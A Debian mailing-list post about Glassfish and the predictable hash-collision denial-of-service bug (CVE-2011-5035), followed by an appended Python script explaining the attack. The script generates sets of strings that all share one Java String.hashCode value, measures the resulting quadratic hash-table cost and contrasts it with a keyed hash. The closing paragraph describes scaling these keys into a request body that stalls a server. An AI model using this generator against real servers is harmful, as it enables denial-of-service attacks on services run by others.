Bug#653964: glassfish predictable hash collisions

Moritz Muehlenhoff jmm at inutil.org
Mon Jan 2 18:24:05 UTC 2012


On Mon, Jan 02, 2012 at 09:56:20AM +0100, Torsten Werner wrote:
> Hi,
> 
> On Sun, Jan 1, 2012 at 11:53 PM, Thijs Kinkhorst <thijs at debian.org> wrote:
> > It was reported that Glassfish is affected by the predictable hash collisions
> > attack that made its rounds around the net this week. This is tracked at
> > http://security-tracker.debian.org/tracker/CVE-2011-5035
> 
> I do not think that we are vulnerable because Debian does not ship a
> full glassfish stack. We build some core libs only.
> 
> > Can you ensure that fixed packages are uploaded to sid as soon as possible,
> > and assert whether a fix for lenny and squeeze would be necessary?
> 
> I do not even understand how to reproduce the issue. May you elaborate
> on that, please?

The advisory can be found here: http://www.nruns.com/_downloads/advisory28122011.pdf

I'm not sure where to find "Oracle security ticket S0104869", though.

Cheers,
         Moritz
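For readers who, like Torsten above, want to see how the issue is reproduced: the attack in the n.runs advisory relies on java.lang.String.hashCode() being a fixed, public function (h = 31*h + c), so an attacker can precompute thousands of distinct keys that land in one bucket and send them as request parameters. The script below is an added illustration, not code from glassfish, Debian, or the advisory. It reimplements String.hashCode() in Python, builds colliding keys from the classic "Aa" / "BB" pair, counts how a chained hash table degrades on them, and shows that a keyed hash with a per-process secret (here BLAKE2b, an assumption standing in for whatever randomized hash a fixed runtime might use) defeats the precomputed set.

```python
"""Predictable String.hashCode() collisions (CVE-2011-5035 class of bug):
generate colliding keys, measure the hash-table blow-up, compare a keyed hash.
Added illustration; not code from glassfish, Debian, or the n.runs advisory."""
import hashlib
import os
from itertools import product


def java_string_hash(s: str) -> int:
    """Reimplementation of java.lang.String.hashCode(): h = 31*h + c over the
    characters, with Java's signed 32-bit wraparound.  Deterministic and
    public, which is exactly what makes its collisions predictable."""
    h = 0
    for ch in s:
        h = (31 * h + ord(ch)) & 0xFFFFFFFF
    return h - (1 << 32) if h & 0x80000000 else h


def two_char_collisions(target: str = "Aa") -> list:
    """All printable-ASCII two-character strings whose hash equals
    hash(target).  For "Aa" (31*65 + 97 = 2112) this is ["Aa", "BB", "C#"]."""
    want = java_string_hash(target)
    hits = []
    for c1 in range(33, 127):
        c2 = want - 31 * c1
        if 33 <= c2 <= 126:
            hits.append(chr(c1) + chr(c2))
    return hits


def colliding_keys(blocks: int, target: str = "Aa") -> list:
    """Concatenate `blocks` equal-length, equal-hash fragments.  Because
    hash(a + b) == hash(a) * 31**len(b) + hash(b) (mod 2**32), every
    combination shares one hash: len(fragments)**blocks keys, one bucket."""
    frags = two_char_collisions(target)
    return ["".join(p) for p in product(frags, repeat=blocks)]


def keyed_hash(s: str, key: bytes) -> int:
    """Mitigation sketch (assumption, not the vendor's fix): a keyed hash
    with a per-process secret.  Without the key the attacker cannot
    precompute a colliding set."""
    d = hashlib.blake2b(s.encode(), key=key, digest_size=4).digest()
    return int.from_bytes(d, "little")


def chained_insert_cost(keys, hasher, nbuckets: int = 1024) -> int:
    """Insert keys into a chained table and count key comparisons.  Each
    insert scans its bucket for an equal key, so k keys in one bucket cost
    k*(k-1)/2 comparisons: the quadratic work behind the DoS."""
    buckets = [[] for _ in range(nbuckets)]
    comparisons = 0
    for k in keys:
        chain = buckets[hasher(k) % nbuckets]
        comparisons += len(chain)  # one comparison per resident key
        if k not in chain:
            chain.append(k)
    return comparisons


if __name__ == "__main__":
    keys = colliding_keys(4)  # 3**4 = 81 constructed colliding keys
    print(len(keys), "keys, all hashing to", java_string_hash(keys[0]))
    print("comparisons with String.hashCode():",
          chained_insert_cost(keys, java_string_hash))
    secret = os.urandom(16)
    print("comparisons with a keyed hash:",
          chained_insert_cost(keys, lambda s: keyed_hash(s, secret)))
```

Raising `blocks` grows the colliding set exponentially (3**blocks keys here; the advisory's attacker uses a much larger alphabet), so a single POST body of a few hundred kilobytes of such parameter names costs the server minutes of CPU when the parameters are stored in a java.util.HashMap. Limiting the number of parameters per request, or switching to a randomized hash, are the two standard mitigations.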